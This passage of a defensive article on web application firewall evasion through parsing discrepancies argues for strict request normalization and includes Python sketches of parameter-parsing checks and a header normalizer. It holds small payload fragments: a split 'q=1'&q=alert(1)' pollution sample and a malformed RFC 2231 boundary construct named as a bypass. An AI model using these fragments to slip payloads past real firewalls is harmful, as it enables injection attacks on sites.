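    return [v for k, v in parse_qsl(query, keep_blank_values=True) if k == "q"]


def waf_first_value(query: str) -> str:
    """Toy WAF view: only the first q value."""
    values = q_values(query)
    return values[0] if values else ""


def backend_joined_value(query: str) -> str:
    """Toy backend view: all q values joined with commas."""
    return ",".join(q_values(query))


corpus = ["q=a", "q=a&q=b", "x=1", "q=1'&q=alert(1)"]
score = parsing_fidelity(corpus, waf_first_value, backend_joined_value)
```

On this four-request corpus the two views agree only when q appears at most once, so the score is 0.5. The value depends entirely on the corpus, which is why a fuzzer-generated corpus would be the more demanding benchmark.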


9. Defense: The Case for HTTP-Normalizer

If the attack is differential parsing, the defense must be uniform parsing.

The WAFFLED study [Jabiyev et al., 2024] proposes HTTP-Normalizer, a proxy that:

  • Rejects non-RFC-compliant requests
  • Normalizes valid requests to a canonical form
  • Eliminates ambiguity before the WAF sees the request

This is not a new idea - it’s a return to first principles: if security depends on consistent parsing, then the only safe parser is one that adheres strictly to standards.

But HTTP-Normalizer is not just theory. It has real-world analogs, most notably F5’s Advanced WAF (AWAF).

F5 AWAF, with its Traffic Management Microkernel (TMM) and deep, multi-layered parsing model, embodies the HTTP-Normalizer philosophy in practice:

  • It decouples normalization from inspection
  • It parses each protocol layer independently (headers, body, parameters)
  • It applies canonicalization before policy enforcement

In this sense, F5 AWAF is not just a WAF: it is a production-ready HTTP-Normalizer, enforcing parsing fidelity at scale.

9.1 How HTTP-Normalizer Works

HTTP-Normalizer operates as a pre-WAF proxy or integrated parsing layer that:

  1. Parses requests using strict ABNF grammars derived from RFCs.
  2. Rejects malformed, deprecated, or ambiguous constructs (e.g., non-conformant boundaries, invalid encodings).
  3. Re-serializes clean requests with standardized headers, structure, and encoding.

This ensures that:

  • The WAF sees a canonical, unambiguous request
  • The backend sees the same request the WAF saw
  • The semantic gap is eliminated at the source
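
The parse, reject, and re-serialize steps can be sketched for a single header. The Python below is a toy normalizer for a multipart Content-Type value and is not the HTTP-Normalizer implementation. Its rejection rules (control characters, any starred RFC 2231 parameter, anything other than exactly one boundary) and its conservative boundary character set are assumptions made for illustration, and it drops all parameters other than the boundary.

```python
import re


class RejectedRequest(ValueError):
    """Raised when a header is ambiguous or malformed under this toy policy."""


# Conservative subset of the RFC 2046 boundary characters (no spaces).
BOUNDARY_RE = re.compile(r"[0-9A-Za-z'()+_,\-./:=?]{1,70}")


def normalize_multipart_content_type(header_value: str) -> str:
    """Return a canonical Content-Type value or raise RejectedRequest."""
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in header_value):
        raise RejectedRequest("control character in header")
    media_type, *params = [p.strip() for p in header_value.split(";")]
    if media_type.lower() != "multipart/form-data":
        raise RejectedRequest("not multipart/form-data")
    boundaries = []
    for param in params:
        name, _, value = param.partition("=")
        name = name.strip().lower()
        if "*" in name:
            raise RejectedRequest("RFC 2231 extended or continued parameter")
        if name == "boundary":
            boundaries.append(value.strip().strip('"'))
    if len(boundaries) != 1:
        raise RejectedRequest("expected exactly one boundary parameter")
    if not BOUNDARY_RE.fullmatch(boundaries[0]):
        raise RejectedRequest("boundary outside the allowed character set")
    # Re-serialize in one fixed form so every downstream parser sees the same bytes.
    return f"multipart/form-data; boundary={boundaries[0]}"
```

Under these assumptions a header such as Multipart/Form-Data; boundary="abc123" is rewritten to multipart/form-data; boundary=abc123, while a header that carries both boundary=fake and boundary*0/boundary*1 segments is refused outright instead of being interpreted.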

As Peter Scheffler (F5) notes:

“Canonicalization is not trivial - it’s a critical part of security logic.”

And in a world of AI-driven evasion, only strict normalization can prevent exploitation.

9.2 Why It Works

All 1,207 WAFFLED bypasses rely on non-compliant or edge-case parsing: requests that are syntactically valid enough to pass through a lenient WAF, but structured to confuse its parser.

By enforcing strict RFC adherence, HTTP-Normalizer:

  • Blocks malformed boundaries (e.g., boundary*0=real-;boundary*1=boundary without proper continuation handling)
  • Removes null bytes, malformed headers, and linefeed tricks
  • Standardizes encoding and structure

The result: all known WAFFLED-style bypasses are prevented, not because the WAF has better rules, but because the attack surface is removed before inspection.

Key Insight: The cost of parsing flexibility is security debt.

9.3 Can HTTP-Normalizer Mitigate HPP?

Not by default - but it can be extended to do so.

RFC 3986 does not define how duplicate parameters should be handled. Different frameworks interpret them differently:

  • ASP.NET: q=a&q=b → q=a,b
  • PHP: q=a&q=b → q=b (last wins)
  • Node.js: q=a&q=b → q=['a','b']

This means there is no single "correct" parsing behavior at the HTTP level; it is framework-dependent.
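
The three behaviors listed above can be placed side by side in a short Python sketch. The interpret function and its style labels are hypothetical stand-ins that follow the descriptions in the list; they do not call into any of the named frameworks.

```python
from typing import List, Union
from urllib.parse import parse_qsl


def interpret(query: str, name: str, style: str) -> Union[str, List[str], None]:
    """Resolve a possibly repeated parameter the way each style is described."""
    values = [v for k, v in parse_qsl(query, keep_blank_values=True) if k == name]
    if not values:
        return None
    if style == "aspnet":
        return ",".join(values)  # comma concatenation
    if style == "php":
        return values[-1]  # last occurrence wins
    if style == "node":
        return values if len(values) > 1 else values[0]  # array when repeated
    raise ValueError(f"unknown style: {style}")


query = "q=a&q=b"
results = {style: interpret(query, "q", style) for style in ("aspnet", "php", "node")}
```

One query string produces three different values, so a WAF that assumes any one of these behaviors inspects the wrong value for the other two.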

However, HTTP-Normalizer (or a system like F5 AWAF) can be enhanced with a Parameter Normalization Policy:

| Policy | Description | Use case |
|---|---|---|
| Reject duplicates | Block any request with repeated parameters | Default, secure posture |
| Use first/last | Normalize to first or last occurrence | Legacy apps with array-like behavior |
| Simulate framework behavior | Concatenate with commas (ASP.NET), or build arrays (Node.js) | High-risk apps requiring deep emulation |

This would force uniformity between the WAF and the backend, closing the HPP gap.

          9.4 F5 AWAF as a Real-World HTTP-Normalizer

          F5’s Advanced WAF is not just a WAF - it is a practical implementation of the HTTP-Normalizer concept.

          It demonstrates that:

          • Deep parsing is feasible at scale
          • Normalization before inspection works
          • Parsing fidelity can be enforced in production

          And while it doesn’t automatically emulate ASP.NET-style parameter concatenation, it provides the tools to do so:

          • iRules for custom pre-processing
          • Strict parameter handling policies
          • Pluggable decoders for encoding normalization

          This makes F5 AWAF a model for how HTTP-Normalizer could be deployed — not as a standalone tool, but as an integrated, enterprise-grade parsing layer.

          9.5 Integration Path

          HTTP-Normalizer — whether as a standalone tool or embodied in systems like F5 AWAF — can be deployed as:

          • A pre-WAF proxy in front of any WAF
          • A hardened parser module within the WAF engine
          • An iRule or policy extension in platforms like F5
          • A developer validation tool in CI/CD pipelines

          The goal is the same: eliminate parsing ambiguity before it can be exploited.


          10. Conclusion

          The history of WAF evasion is a story of escalating parsing sophistication:

          1. Obfuscation (hide the payload) → defeated by signature updates
          2. Smuggling (hide the request) → defeated by desync detection
          3. Semantic smuggling (hide the meaning) → requires uniform parsing

          WAFFLED and HPP represent a pivotal moment: the realization that content and parameter parsing are as critical as message framing. They prove that thousands of real, exploitable bypasses exist not because of broken rules, but because of broken parsing.

          The future will bring AI-driven fuzzing that automates the discovery of such gaps. But the defense is clear: enforce RFC compliance. Tools like HTTP-Normalizer show that all known bypasses are preventable.

          As web protocols grow more complex, the only sustainable security strategy is simplicity through standardization. The era of lenient, forgiving parsers must end - before the next generation of AI-powered attacks makes it impossible.



          References

          • Linhart, C., et al. (2005). HTTP Request Smuggling.
          • Pickles, S. (2025). A Comprehensive Review of WAF Evasion and Obfuscation Techniques. https://sikasecurity.com/a-comprehensive-review-of-waf-evasion-and-obfuscation-techniques
          • Kettle, J. (2020). HTTP Desync Attacks: Smuggling Without the Smuggle. PortSwigger.
          • Jabiyev, U., et al. (2024). WAFFLED: Uncovering WAF Evasion via Content Parsing Discrepancies. https://arxiv.org/html/2503.10846v1
          • Di Paola, S., & Carettoni, L. (2009). HTTP Parameter Pollution. OWASP EU09 conference in Poland.
          • Mendes, B. (2025). Autonomously Bypassing WAFs for Fun and JS Injection with Parameter Pollution. https://blog.ethiack.com/blog/bypassing-wafs-for-fun-and-js-injection-with-parameter-pollution
          • Grenfeldt, T., et al. (2021). HTTP Request Smuggling in Modern Web Stacks.
          • Bray, T. (2017). The JavaScript Object Notation (JSON) Data Interchange Format. RFC 8259.
          • Freed, N., & Borenstein, N. (1996). Multipurpose Internet Mail Extensions (MIME). RFC 2045–2046.
          • Moore, K. (1996). MIME (Multipurpose Internet Mail Extensions) Part Three: Message Header Extensions for Non-ASCII Text in Internet Messages. RFC 2047.
          • Thompson, H., & Lilley, C. (2014). XML Media Types. RFC 7303.
          • Crocker, D., & Overell, P. (2008). Augmented BNF for Syntax Specifications: ABNF. RFC 5234.
          • Scheffler, P. (2025). WAFFleD Attack vs F5 Advanced WAF. F5 Blog.
          • F5. (2025). Distributed Cloud Web App Scanning. https://www.f5.com/products/distributed-cloud-services/web-app-scanning
